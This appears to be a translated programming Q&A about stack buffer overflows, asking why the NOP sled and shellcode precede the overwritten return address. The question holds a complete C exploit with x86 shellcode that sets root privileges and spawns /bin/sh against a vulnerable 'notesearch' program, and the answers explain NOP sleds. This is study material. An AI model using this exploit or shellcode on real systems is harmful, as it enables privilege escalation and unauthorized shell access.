【问题标题】:Why is the "NOP-Block" and the Shellcode before the return Address?为什么返回地址之前是“NOP-Block”和Shellcode?
【发布时间】:2018-07-17 14:11:36
【问题描述】:

在这个例子中,布局是[NOP-Block][Shellcode][Return Adress] 但是为什么我不能用地址覆盖原来的返回地址到我的Shellcode?​​p>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

【问题讨论】:

    标签: c assembly reverse-engineering buffer-overflow cracking


    【解决方案1】:

    NOP-slide 是一种技术,当您无法准确预测 shell 执行时将在哪个偏移量处开始执行时,您必须在前导码中使用 nop 填充 shellcode 以确保执行不会在你的 shellcode 的“中间”。

    CPU 只是简单地滑过 nop,而不影响除指令指针之外的任何寄存器。

    在您的代码中,我认为您正在使用当前进程中的局部变量 i 的地址对来自 notesearch 的 main 的返回地址进行三角测量。根据编译器和平台,复制缓冲区(也是argv[1])中执行开始的实际位置可能相差几个字节。因此,您需要添加几字节的幻灯片以确保一切正常。

    【讨论】:

      【解决方案2】:

      NOP 块用于堆栈溢出利用,因为您无法预测返回地址的放置位置。 当你利用漏洞时,你不能直接影响执行流程——这意味着你不能运行你的shellcode,但是可以把这段代码放在易受攻击的应用程序的内存中并期待它由执行流程运行。 您无法预测易受攻击字符串所在的函数的大小,因此向 shellcode 添加 NOP 会增加覆盖返回地址处的代码并在 NOP 之后成功执行有效负载的机会。

      【讨论】:

        猜你喜欢
        • 2013-05-23
        • 2021-11-13
        • 1970-01-01
        • 2011-02-02
        • 2017-07-30
        • 1970-01-01
        • 2012-02-27
        • 1970-01-01
        • 1970-01-01
        相关资源
        最近更新 更多